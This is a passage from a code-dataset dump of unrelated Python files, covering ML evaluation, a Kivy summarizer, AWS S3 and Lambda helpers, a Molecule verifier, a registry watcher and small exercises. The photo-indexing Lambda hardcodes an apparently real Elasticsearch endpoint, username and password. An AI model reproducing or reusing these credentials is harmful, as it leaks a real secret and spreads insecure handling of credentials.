\"]\"\n top_coil_str = \"/Equipment/Surface Coils/Settings/Set Points/Top Set Currents[\" + str(i-1) + \"]\"\n \n if i < 10:\n num = \"00\" + str(i)\n if 9 < i < 100:\n num = \"0\" + str(i)\n if i == 100:\n num = str(i)\n\n bot_str = \"B-\" + num\n top_str = \"T-\" + num\n \n odb.set_value(bot_coil_str, data[str(bot_str)])\n odb.set_value(top_coil_str, data[str(top_str)])\n","sub_path":"online/SurfaceCoilConfiguration/SetODBCurrents.py","file_name":"SetODBCurrents.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"364873039","text":"import os\nimport time\nimport random\nimport numpy as np\nimport tensorflow as tf\nimport utils.constants as cs\nfrom sklearn import preprocessing\nfrom models.bi_lstm import Bi_LSTM\nfrom tensorflow.python.platform import gfile\nfrom utils import utility, os_utils, cv_utils\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef get_batch(video_path, all_frame):\n # batch_x = cv_utils.prepare_batch_frames(video_path, all_frame=all_frame)\n batch_x = utility.prepare_batch_frames_from_bg_data(video_path)\n return batch_x\n\n\ndef get_target_name(video_path):\n # print(video_path)\n split_path = video_path.split(cs.SLASH)\n # print(int(split_path[-1][0:3]))\n return int(split_path[-1][0:3])\n\n\ndef get_label_enocder(path_gen):\n list_of_target_names = []\n one_hot_list = []\n\n counter = 1\n for video_path in path_gen:\n # batch_x = get_batch(video_path, False)\n #\n # if batch_x is None:\n # continue\n\n list_of_target_names.append(get_target_name(video_path))\n one_hot_list.append(get_target_name(video_path))\n counter += 1\n\n # if counter == 10:\n # break\n label_encoder = preprocessing.LabelEncoder()\n label_encoder.fit(one_hot_list)\n transformed = label_encoder.transform(one_hot_list)\n return label_encoder, len(transformed)\n\n\ndef get_encoded_embeddings(logs_path):\n frozen_graph_filename = logs_path + cs.ENCODER1_FREEZED_PB_NAME\n\n with gfile.FastGFile(frozen_graph_filename, \"rb\") as f:\n graph_def = tf.GraphDef()\n byte = f.read()\n graph_def.ParseFromString(byte)\n\n # for node in graph_def.node:\n # print(node.name)\n 
tf.import_graph_def(graph_def, name='')\n\n detection_graph = tf.get_default_graph()\n x = detection_graph.get_tensor_by_name('inputs:0')\n encoded = detection_graph.get_tensor_by_name('encoder/encoded/LeakyRelu/Maximum:0')\n\n # embedding = sess.run(encoded, feed_dict={x: frame})\n # embedding = embedding.reshape((1, embedding.shape[0], embedding.shape[1]))\n\n return x, encoded\n\n\ndef get_encoded_embeddings(logs_path):\n frozen_graph_filename = logs_path + cs.ENCODER1_FREEZED_PB_NAME\n\n with gfile.FastGFile(frozen_graph_filename, \"rb\") as f:\n graph_def = tf.GraphDef()\n byte = f.read()\n graph_def.ParseFromString(byte)\n\n # for node in graph_def.node:\n # print(node.name)\n tf.import_graph_def(graph_def, name='')\n\n detection_graph = tf.get_default_graph()\n x = detection_graph.get_tensor_by_name('inputs:0')\n encoded = detection_graph.get_tensor_by_name('encoder/encoded/LeakyRelu/Maximum:0')\n\n # embedding = sess.run(encoded, feed_dict={x: frame})\n # embedding = embedding.reshape((1, embedding.shape[0], embedding.shape[1]))\n\n return x, encoded\n\n\ndef test():\n encoder_logs_path = cs.BASE_LOG_PATH + cs.MODEL_CONV_AE_1\n bi_lstm_logs_path = cs.BASE_LOG_PATH + cs.MODEL_BI_LSTM\n path_generator = os_utils.iterate_test_data(cs.BASE_DATA_PATH + cs.DATA_BG_TEST_VIDEO, \"mp4\")\n\n graph = tf.Graph()\n accuracy_1 = 0\n accuracy_3 = 0\n accuracy_5 = 0\n\n with graph.as_default():\n rnn = Bi_LSTM(lstm_size=128, batch_len=BATCH_SIZE, output_nodes=14, keep_prob=0.0, learning_rate=0.001)\n rnn.build_model()\n stage_1_ip, stage_2_ip = get_encoded_embeddings(encoder_logs_path)\n prediction = tf.nn.softmax(rnn.predictions)\n saver = tf.train.Saver()\n\n label_encoder, num_classes = get_label_enocder(path_generator)\n path_generator = os_utils.iterate_test_data(cs.BASE_DATA_PATH + cs.DATA_BG_TEST_VIDEO, \"mp4\")\n\n with tf.Session(graph=graph) as sess:\n saver.restore(sess, tf.train.latest_checkpoint(bi_lstm_logs_path))\n state_fw = sess.run(rnn.initial_state_fw)\n state_bw = sess.run(rnn.initial_state_bw)\n loop_count = 0\n for video_path in path_generator:\n # print(video_path)\n batch_x = get_batch(video_path, True)\n batch_y = get_target_name(video_path)\n\n encoded_batch = sess.run(stage_2_ip, feed_dict={stage_1_ip: batch_x})\n encoded_batch = encoded_batch.reshape((1, encoded_batch.shape[0], encoded_batch.shape[1]))\n\n feed = {rnn.inputs_: encoded_batch,\n rnn.targets_: label_encoder.transform([batch_y]),\n rnn.keep_prob: 0.5,\n rnn.initial_state_fw: state_fw,\n rnn.initial_state_bw: state_bw}\n\n probabilities_1, probabilities_3, probabilities_5 = sess.run([tf.nn.top_k(prediction, k=1),\n tf.nn.top_k(prediction, k=3),\n tf.nn.top_k(prediction, k=5)],\n feed_dict=feed)\n\n print(probabilities_1[1][0])\n print(probabilities_3[1][0])\n print(probabilities_5[1][0])\n print(batch_y - 1)\n\n if batch_y - 1 in probabilities_1[1][0]:\n accuracy_1 += 1\n print(\"accuracy_1 =\", accuracy_1)\n\n if batch_y - 1 in probabilities_3[1][0]:\n accuracy_3 += 1\n print(\"accuracy_3 =\", accuracy_3)\n\n if batch_y - 1 in probabilities_5[1][0]:\n accuracy_5 += 1\n print(\"accuracy_5 =\", accuracy_5)\n loop_count += 1\n\n print(\"==============================\", loop_count, \"=================================\")\n\n print(accuracy_1, 100 * accuracy_1 / 280)\n print(accuracy_3, 100 * accuracy_3 / 280)\n print(accuracy_5, 100 * accuracy_5 / 280)\n\n\nif __name__ == \"__main__\":\n total_start_time = time.time()\n BATCH_SIZE = 1\n test()\n total_end_time = time.time()\n 
print(\"===================================================\")\n    print(\"Total Execution Time =\", total_end_time - total_start_time)\n    print(\"===================================================\")\n\n    # 1748.5977\n","sub_path":"core/test_bi_lstm.py","file_name":"test_bi_lstm.py","file_ext":"py","file_size_in_byte":6029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"578320680","text":"class Wizard:\n    def __init__(self, name, health, damage):\n        self.name = name\n        self.health = int(health)\n        self.damage = int(damage)\n\n\ndef main():\n    wizards = []\n    data = input()\n    while data != 'fight':\n        wizard_names = list(map(lambda w: w.name, wizards))\n        command, name, health, damage = data.split()\n        if command == 'new':\n            if name not in wizard_names:\n                obj = Wizard(name, health, damage)\n                wizards.append(obj)\n            else:\n                print(\"Wizard already exists!\")\n        elif command == 'edit':\n            if name not in wizard_names:\n                print(\"Wizard does not exist!\")\n            else:\n                current_wizard = list(filter(lambda w: w.name == name, wizards))[0]\n                current_wizard.health += int(health)\n                current_wizard.damage += int(damage)\n\n        data = input()\n\n    battle(wizards)\n    for wizard in sorted(wizards, key=lambda w: -w.health):\n        print(f\"Wizard: {wizard.name}. Health: {wizard.health}. Damage power: {wizard.damage}\")\n\n\ndef battle(wizards):\n    data = input()\n    while data != 'end':\n        w1, w2 = data.split(' <=> ')\n        wizard_names = list(map(lambda w: w.name, wizards))\n        if w1 in wizard_names and w2 in wizard_names:\n            attacker = list(filter(lambda w: w.name == w1, wizards))[0]\n            attacked = list(filter(lambda w: w.name == w2, wizards))[0]\n            attacked.health -= int(attacker.damage)\n            attacker.health += 50\n            if attacked.health <= 0:\n                print(f\"Fatality - {attacker.name} wins!\")\n                wizards.remove(attacked)\n            else:\n                print(f\"Next time {attacked.name}!\")\n        else:\n            print(\"Cannot place a fight with non-existing wizards!\")\n        data = input()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Python/Python-Fundamentals/Exam/3.Wizards.py","file_name":"3.Wizards.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"532108798","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    smARt-cOAch (AROA): Stratification Tool (AROA-STRT)\n\n    @description: Enables non-experts to build clusters of similar users and understand their evolution\n    @author: Jon Kerexeta - Vicomtech Foundation, Basque Research and Technology Alliance (BRTA)\n    @author: Andoni Beristain Iraola - Vicomtech Foundation, Basque Research and Technology Alliance (BRTA)\n    @author: Roberto Álvarez Sánchez - Vicomtech Foundation, Basque Research and Technology Alliance (BRTA)\n    @version: 0.1\n\"\"\"\n\n# Stdlib imports\n\n# Third-party app imports\n\n# Imports from your apps\n\n\ndef day_from_beginning(df, user, date):\n    min_date = df[df['User ID'] == user]['datetime'].min()\n    return (date - min_date).days\n\n\ndef define_color(val, max_=10, min_=-10, center_color_in_0='Progressive'):\n    if center_color_in_0 == 'Progressive':\n        middle_value = (max_ + min_)/2\n    else:\n        middle_value = 0\n    if val >= middle_value:\n        if val >= max_:\n            return 'rgb(0, 255, 100)'\n        else:\n            val_extrapolated = int(255 * (max_ - val)/max_)\n            return 'rgb({}, 255,100)'.format(val_extrapolated)\n    else:\n        if val <= min_:\n            return 'rgb(255, 0, 100)'\n        else:\n            val_extrapolated = int(255 * (abs((min_ - val)/min_)))  # mirrors the (max_ - val)/max_ scaling of the positive branch; '+' here produced out-of-range RGB values\n            return 'rgb(255, {}, 
100)'.format(val_extrapolated)\n","sub_path":"utils/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96297082","text":"import boto3\nimport requests\nimport json\nfrom requests_aws4auth import AWS4Auth\nfrom datetime import datetime\n\n\nbot = boto3.client('s3')\n#herere\n\ndef lambda_handler(event, context):\n print(event)\n record = event[\"Records\"][0]\n bucket = record['s3']['bucket']['name']\n name = record['s3']['object']['key']\n print(bucket)\n print(name)\n \n labels = getRekognitionLabel(bucket, name)\n print(labels)\n \n try:\n headerLabels = bot.head_object(Bucket=bucket, Key=name)\n print(\"headerLabels\", headerLabels)\n print(\"headerLabels\", headerLabels['Metadata'])\n customlabel = headerLabels['Metadata']['customlabels']\n customlabels = customlabel.split(\",\")\n for lab in customlabels:\n lab = lab.strip()\n labels.append(lab)\n labels.append(lab + 's')\n except:\n print(\"There is no custom label\")\n \n \n \n doc = parsePhoto(bucket, name, labels)\n print('doc is:')\n print(doc)\n reply = transToES(doc)\n print('reply from es is:')\n print(reply)\n\n return {\n 'statusCode' : 200,\n 'body' : json.dumps(\"indexed successfully\")\n }\n \n#\n# Function to generate the labels for current pic\n#\ndef getRekognitionLabel(bucket, name):\n boto = boto3.session.Session('','',region_name='us-east-1')\n reko = boto.client('rekognition')\n response = reko.detect_labels(\n Image = {\n 'S3Object' : {\n 'Bucket' : bucket,\n 'Name' : name\n }\n },\n MaxLabels=10\n )\n \n labels = []\n for res in response['Labels']:\n labels.append(res['Name'])\n labels.append(res['Name'] + 's')\n \n return labels\n\n#\n# Function to parse current pic's info as the format to be stored in Elasticsearch\n#\ndef parsePhoto(bucket, name, labels):\n doc = {\n 'objectKey' : name,\n 'bucket' : bucket,\n \"createdTimeStamp\" : datetime.now().strftime(\"%y-%m-%d %H:%M:%S\"),\n 'labels' : labels\n }\n return doc\n \n\n#\n# Function to connect ElasticSearch and upload photo info to it\n#\ndef transToES(doc):\n # Prepare the info for uploading\n host = 'https://search-photos-test-cpptiglxjbeoo2lxp4c2ybywke.us-east-1.es.amazonaws.com/photos/Photo'\n headers = { \"Content-Type\": \"application/json\" }\n response = requests.post(host, auth=(\"shihan\", \"Iamshihan1015@\"), json=doc, headers=headers)\n return response\n","sub_path":"index-photos/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"409699046","text":"# Copyright (c) 2015-2016 Cisco Systems, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR 
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nimport fnmatch\nimport os\n\nimport sh\n\nfrom molecule import ansible_playbook\nfrom molecule import config\nfrom molecule import util\nfrom molecule.verifier import base\n\n\nclass Testinfra(base.Base):\n def __init__(self, molecule):\n super(Testinfra, self).__init__(molecule)\n self._testinfra_dir = molecule.config.config['molecule'][\n 'testinfra_dir']\n self._debug = molecule.args.get('debug')\n\n def execute(self):\n \"\"\"\n Executes linting/integration tests and returns None.\n\n Flake8 performs the code linting.\n Testinfra executes integration tests.\n\n :return: None\n \"\"\"\n ansible = ansible_playbook.AnsiblePlaybook(\n self._molecule.config.config['ansible'], {},\n _env=self._molecule.env)\n\n testinfra_options = config.merge_dicts(\n self._molecule.driver.testinfra_args,\n self._molecule.config.config['verifier']['options'])\n\n testinfra_options['ansible_env'] = ansible.env\n if self._molecule.args.get('debug'):\n testinfra_options['debug'] = True\n if self._molecule.args.get('sudo'):\n testinfra_options['sudo'] = True\n\n tests = self._get_tests()\n if len(tests) > 0:\n if 'flake8' not in self._molecule.disabled:\n self._flake8(tests)\n self._testinfra(tests, **testinfra_options)\n\n def _testinfra(self,\n tests,\n debug=False,\n ansible_env={},\n out=util.callback_info,\n err=util.callback_error,\n **kwargs):\n \"\"\"\n Executes testinfra against specified tests and returns a :func:`sh`\n response object.\n\n :param tests: A list of testinfra tests.\n :param debug: An optional bool to toggle debug output.\n :param pattern: A string containing the pattern of files to lint.\n :param ansible_env: An optional environment to pass to underlying\n :func:`sh` call.\n :param out: An optional function to process STDOUT for underlying\n :func:`sh` call.\n :param err: An optional function to process STDERR for underlying\n :func:`sh` call.\n :return: :func:`sh` response object.\n \"\"\"\n kwargs['debug'] = debug\n kwargs['_env'] = ansible_env\n kwargs['_out'] = out\n kwargs['_err'] = err\n\n msg = 'Executing testinfra tests found in {}/...'.format(\n self._testinfra_dir)\n util.print_info(msg)\n\n verbose = 'v'\n verbose_flag = str()\n for i in range(0, 3):\n if kwargs.get(verbose):\n verbose_flag = '-{}'.format(verbose)\n del kwargs[verbose]\n if kwargs.get('verbose'):\n del kwargs['verbose']\n break\n verbose = verbose + 'v'\n\n cmd = sh.testinfra.bake(tests)\n if verbose_flag:\n cmd = cmd.bake(verbose_flag)\n cmd = cmd.bake(**kwargs)\n\n return util.run_command(cmd, debug=self._debug)\n\n def _flake8(self, tests, out=util.callback_info, err=util.callback_error):\n \"\"\"\n Executes flake8 against specified tests and returns a :func:`sh`\n response object.\n\n :param tests: A list of testinfra tests.\n :param out: An optional function to process STDOUT for underlying\n :func:`sh` call.\n :param err: An optional function to process STDERR for underlying\n :func:`sh` call.\n :return: :func:`sh` response object.\n \"\"\"\n msg = 'Executing flake8 on *.py files found in {}/...'.format(\n self._testinfra_dir)\n util.print_info(msg)\n\n cmd = sh.flake8.bake(tests)\n return util.run_command(cmd, debug=self._debug)\n\n def _get_tests(self):\n return [\n filename\n for filename in 
self._walk(self._testinfra_dir, 'test_*.py')\n        ]\n\n    def _walk(self, directory, pattern):\n        # Python 3.5 supports a recursive glob without needing os.walk.\n        for root, dirs, files in os.walk(directory):\n            for basename in files:\n                if fnmatch.fnmatch(basename, pattern):\n                    filename = os.path.join(root, basename)\n\n                    yield filename\n","sub_path":"molecule/verifier/testinfra.py","file_name":"testinfra.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"361596490","text":"# -*- coding: utf-8 -*-\nu\"\"\".\nAPI for interacting with AWS-S3\n*****************************\nMauro Zackiewicz, Probabit, Feb. 2017\n\"\"\"\nimport boto\n\n\nS3_ID = \"seu_id\"\nS3_KEY = \"sua_key\"\n\n\ndef salvar_s3(local, arquivo, filename):\n    u\"\"\".\n    Saves a file (file-like object)\n    to an existing bucket [local] on S3\n    under this name (overwrites if it already exists)\n    \"\"\"\n    s3 = boto.connect_s3(\n        aws_access_key_id=S3_ID,\n        aws_secret_access_key=S3_KEY\n    )\n    bucket = s3.get_bucket(local)\n    key = bucket.new_key(filename)\n    key.set_contents_from_file(arquivo)\n\n\ndef abrir_s3(local, filename):\n    u\"\"\".\n    Opens an existing file on S3\n    and returns its content as a string\n    => ready for processing\n    \"\"\"\n    s3 = boto.connect_s3(\n        aws_access_key_id=S3_ID,\n        aws_secret_access_key=S3_KEY\n    )\n    bucket = s3.get_bucket(local)\n    k = bucket.get_key(filename)\n    return k.get_contents_as_string()\n\n\ndef lista_files_s3(local):\n    u\"\"\".\n    Returns the list of files existing in a bucket\n    \"\"\"\n    s3 = boto.connect_s3(\n        aws_access_key_id=S3_ID,\n        aws_secret_access_key=S3_KEY\n    )\n    bucket = s3.get_bucket(local)\n    return [key.name.encode('utf-8') for key in bucket.list()]\n\n\ndef arquivar_s3(local, filename, novo_local):\n    u\"\"\".\n    Moves the file from local to novo_local\n    bucket.copy_key(new_key_name, src_bucket_name, src_key_name,)\n    \"\"\"\n    s3 = boto.connect_s3(\n        aws_access_key_id=S3_ID,\n        aws_secret_access_key=S3_KEY\n    )\n    # copy\n    para = s3.get_bucket(novo_local)\n    para.copy_key(filename, local, filename)\n    # delete\n    de = s3.get_bucket(local)\n    de.delete_key(filename)\n\n\ndef apagar_s3(local, filename):\n    u\"\"\".\n    Deletes the file from local\n    \"\"\"\n    s3 = boto.connect_s3(\n        aws_access_key_id=S3_ID,\n        aws_secret_access_key=S3_KEY\n    )\n    x = s3.get_bucket(local)\n    x.delete_key(filename)\n","sub_path":"s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"105597825","text":"import json\nimport os\nimport httplib2\nfrom . 
import config\n\nUSER_AGENT = 'Coconut/2.2.0 (Python)'\n\ndef submit(config_content, **kwargs):\n heywatch_url = os.getenv('COCONUT_URL', 'https://api.coconut.co')\n api_key = os.getenv('COCONUT_API_KEY')\n\n if 'api_key' in kwargs:\n api_key = kwargs['api_key']\n\n h = httplib2.Http()\n h.add_credentials(api_key, '')\n\n headers = {'User-Agent': USER_AGENT, 'Content-Type': 'text/plain', 'Accept': 'application/json'}\n\n response, content = h.request(heywatch_url + '/v1/job', 'POST', body=config_content, headers=headers)\n\n return json.loads(content.decode('utf-8'))\n\ndef create(**kwargs):\n return submit(config.new(**kwargs), **kwargs)\n","sub_path":"coconut/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"566597234","text":"import cv2\nimport numpy as np\n\nmser=cv2.MSER()\n#mser does significantly better on color than greyscale\nfast=cv2.FastFeatureDetector()\nsurf=cv2.SURF()\norb=cv2.ORB()\nsift=cv2.SIFT()\nbrisk=cv2.BRISK()\n\ncam = cv2.VideoCapture(0)\nret,frame = cam.read()\n#f1=cv2.medianBlur(frame,7)\n#f2=cv2.medianBlur(f1,7)\ndddd = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\nvis = disp = np.float32(dddd) \nwhile True:\n ret,frame = cam.read()\n dddd = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n #f1=cv2.medianBlur(frame,7)\n #f2=framecv2.medianBlur(f1,7)\n flag,f2 = cv2.threshold(dddd,100,120,cv2.THRESH_BINARY)\n #kp=mser.detect(f2,None)\n #hulls =[cv2.convexHull(p.reshape(-1,1,2)) for p in kp]\n\n #cv2.polylines(vis,hulls,1,(0,0,255))\n #kp=sift.detect(f2,None)\n #vis=cv2.drawKeypoints(f2,kp)\n cv2.accumulateWeighted(f2,vis,.9,None)\n runavg = cv2.convertScaleAbs(vis)\n disp=f2-vis\n cv2.imshow('features',disp)\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n cam.release()\n cv2.destroyAllWindows()\n break\n","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153975077","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n# From: https://oj.leetcode.com/problems/search-in-rotated-sorted-array/\n# Status: AC\n# Date: Sep. 
25, 2014\n\nclass Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return an integer\n def search(self, A, target):\n try:\n res = A.index(target)\n except:\n res = -1\n return res\n","sub_path":"week26/Yao/search_in_roated_aorted_array.py","file_name":"search_in_roated_aorted_array.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"402103562","text":"import json\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Split the instance segmentation annotations into a training and testing\r\n# set.\r\n\r\nwith open('../data/w_nebulizer_test_iter6.json', \"r\") as f:\r\n data = json.load(f)\r\n\r\n\r\nimages = data['images']\r\nannotations = data['annotations']\r\n\r\nSMALL = 32*32\r\nMEDIUM = 96*96\r\n# LARGE is above Medium here so not included\r\nsmall_count = 0\r\nmed_count = 0\r\nlarge_count = 0\r\n\r\nfor anno in annotations:\r\n a = anno[\"area\"]\r\n if a <= SMALL:\r\n small_count += 1\r\n elif SMALL < a < MEDIUM:\r\n med_count += 1\r\n else:\r\n large_count += 1\r\n\r\nprint(\"small count: \" + str(small_count))\r\nprint(\"med count: \" + str(med_count))\r\nprint(\"large count: \" + str(large_count))\r\n","sub_path":"helper_scripts/object-size-counter.py","file_name":"object-size-counter.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"262882099","text":"import win32api\nimport win32con\nimport logging\nimport sys\n\nif __name__ == \"__main__\":\n hive_switcher = {\n 'HKCU': win32con.HKEY_CURRENT_USER,\n 'HKLM': win32con.HKEY_LOCAL_MACHINE,\n 'HKCR': win32con.HKEY_CLASSES_ROOT\n }\n\n hive_to_watch = hive_switcher[sys.argv[1]] if len(\n sys.argv) > 1 else win32con.HKEY_CURRENT_USER\n key_to_watch = sys.argv[2] if len(sys.argv) > 2 else 'Software'\n log_file_path = sys.argv[3] if len(sys.argv) > 3 else None\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=log_file_path\n )\n log = logging.getLogger()\n\n values = {(hive_to_watch, key_to_watch, 'DateTime'): (win32con.REG_DWORD, 1),\n (hive_to_watch, key_to_watch, 'Templates'): (win32con.REG_DWORD, 0),\n (hive_to_watch, key_to_watch, 'UnitConv'): (win32con.REG_DWORD, 0)}\n\n while True:\n for (hive, key, value_name), (value_type, value) in values.iteritems():\n handle_with_set_rights = win32api.RegOpenKeyEx(\n hive, key, 0, win32con.KEY_SET_VALUE)\n log.info(r'Setting %s\\%s\\%s = %s' % (hive, key, value_name, value))\n win32api.RegSetValueEx(\n handle_with_set_rights, value_name, 0, value_type, value)\n win32api.RegCloseKey(handle_with_set_rights)\n\n # Open and close the handle here as otherwise the set operation above\n # will trigger a further round\n handle_to_be_watched = win32api.RegOpenKeyEx(\n hive_to_watch, key_to_watch, 0, win32con.KEY_NOTIFY)\n win32api.RegNotifyChangeKeyValue(\n handle_to_be_watched, False, win32api.REG_NOTIFY_CHANGE_LAST_SET, None, False)\n win32api.RegCloseKey(handle_to_be_watched)\n","sub_path":"watch-reg.py","file_name":"watch-reg.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441933661","text":"from kivy.app import App\nfrom kivy.lang import Builder # used to work with builder and apply any design file\nfrom kivy.core.window import Window # used to change the color of the back 
ground\nfrom kivy.uix.screenmanager import ScreenManager, Screen # used to apply multiple screens\n\n\nfrom ReadDocument import ReadDocument\nfrom SummarizeFunction import Summarization\nfrom VideoCaptions.Video2Text import VideoCaptions\nfrom wordcounter.wordcounter import WordCounter\n\n\n# building different pages\nfrom webScraping import webScraping\n\nrunning_app = App.get_running_app()\n\n\nclass MainPage(Screen):\n pass\n\n\nmyText = \"\"\n\n\nclass TextPage(Screen):\n\n def __init__(self, text=\"\", type_id=None, **kwargs):\n super(TextPage, self).__init__(**kwargs)\n self.text = text\n self.type_id = type_id\n\n ##########################################################\n\n def Summarize(self):\n print(\"printed: \" + self.ids.userWrittenText.text)\n summarizer = Summarization()\n summarized_text = summarizer.Summarize(self.ids.userWrittenText.text, self.ids.slider.value)\n self.ids.summarized_label_id.text = summarized_text\n\n word_counter = WordCounter(self.ids.userWrittenText.text, delimiter=' ')\n doc_len = word_counter.get_word_count()\n\n word_counter = WordCounter(summarized_text, delimiter=' ')\n sum_len = word_counter.get_word_count()\n\n rate = str( round(sum_len/doc_len,3)*100 ) + '%'\n self.ids.compression_Ratio_Label_ID.text = rate\n\n print(\"done\")\n\n ##########################################################\n def compression_Rate_Picked(self, value):\n self.ids.compression_Ratio_Label_ID.text = value\n\n\nclass FilePage(Screen):\n\n def viewselecteFile(self, filePath):\n try:\n self.ids.fileSelectedtxt.text = filePath[0]\n except:\n self.ids.fileSelectedtxt.text = \"\"\n\n def selectedVideo(self, filePath):\n captions = VideoCaptions()\n captions.getChunkCaption(filePath)\n print(captions.WriteCaptionInFile())\n layout = self.manager.get_screen('textPage').layout\n layout.text = captions.WriteCaptionInFile()\n\n def selectedFile(self, ischeckboxActive, filePath, first_page, last_page):\n if ischeckboxActive == False:\n self.ids.fileSelectedtxt.text = filePath[0]\n first_page = self.ids.startPagePDFtext.text\n last_page = self.ids.endPagePDFtext.text\n layout = self.manager.get_screen('textPage').layout\n # print(\"test: \"+ReadingFromPDF(filename=filePath[0], f=1, l=4))\n docReader = ReadDocument()\n layout.text = docReader.ReadingFromPDF(filename=filePath[0], firstPage=first_page, lastPage=last_page)\n else:\n self.selectedVideo(filePath)\n\n\nclass UrlPage(Screen):\n def UserUrl(self, url):\n self.ids.urltxt.text = url\n layout = self.manager.get_screen('textPage').layout\n webScraper = webScraping()\n layout.text = webScraper.ReadFromWebSite(URL=url)\n\n pass\n\n\nclass PageManager(ScreenManager):\n pass\n\n\n######################################################\n\n# calling and building the design file (GUI)\n\n\nTheApp = Builder.load_file('summarizeEnterpriseGUI.kv')\n\n\n######################################################\n\n\n######################################################\nclass SummarizeEnterprise(App):\n\n def build(self):\n # setting the color of the background\n Window.clearcolor = (52 / 255.0, 73 / 255.0, 94 / 255.0, 1)\n return TheApp # sm\n\n\nif __name__ == '__main__':\n SummarizeEnterprise().run()","sub_path":"summarizeEnterprise.py","file_name":"summarizeEnterprise.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"359720824","text":"import json\nimport pandas as pd\nimport vincent\n\ncounty_data = 
r'data/us_county_data.csv'\ncounty_geo = r'data/us-counties.json'\nstate_geo = r'data/us-states.json'\nstate_unemployment = r'data/US_Unemployment_Oct2012.csv'\n\n#We want to map the county codes we have in our geometry to those in the\n#county_data file, which contains additional rows we don't need\nwith open(county_geo, 'r') as f:\n get_id = json.load(f)\n \ncounty_codes = [x['id'] for x in get_id['features']]\ncounty_df = pd.DataFrame({'FIPS_Code': county_codes}, dtype=str)\n\n#Read into Dataframe, cast to string for consistency\ndf = pd.read_csv(county_data, na_values=[' '])\ndf['FIPS_Code'] = df['FIPS_Code'].astype(str)\n\n#Perform an inner join, pad NA's with data from nearest county\nmerged = pd.merge(df, county_df, on='FIPS_Code', how='inner')\nmerged = merged.fillna(method='pad')\n\npath = 'vega.json'\n\n#Map different data sets\nvis = vincent.Map(width=1000, height=800)\nvis.tabular_data(merged, columns=['FIPS_Code', 'Unemployment_rate_2011']) \nvis.geo_data(projection='albersUsa', scale=1000, bind_data='data.id', counties=county_geo)\nvis += ([\"#f5f5f5\",\"#000045\"], 'scales', 0, 'range')\nvis.to_json(path, html=True)\n\nvis.tabular_data(merged, columns=['FIPS_Code', 'Median_Household_Income_2011'])\nvis.to_json(path)\n\nvis.tabular_data(merged, columns=['FIPS_Code', 'Civilian_labor_force_2011']) \nvis.to_json(path, html=True)\n\n#Swap county data for state data, reset map\nstate_data = pd.read_csv(state_unemployment)\nvis.tabular_data(state_data, columns=['State', 'Unemployment'])\nvis.geo_data(bind_data='data.id', reset=True, states=state_geo)\nvis.update_map(scale=1000, projection='albersUsa')\nvis += (['#c9cedb', '#0b0d11'], 'scales', 0, 'range')\nvis.to_json(path, html=True)\n","sub_path":"examples/vincent_choropleth.py","file_name":"vincent_choropleth.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470189603","text":"import brandes\n\nedges1 = [[0, 1], [1, 2], [1]]\nedges2 = [[0], [0, 1, 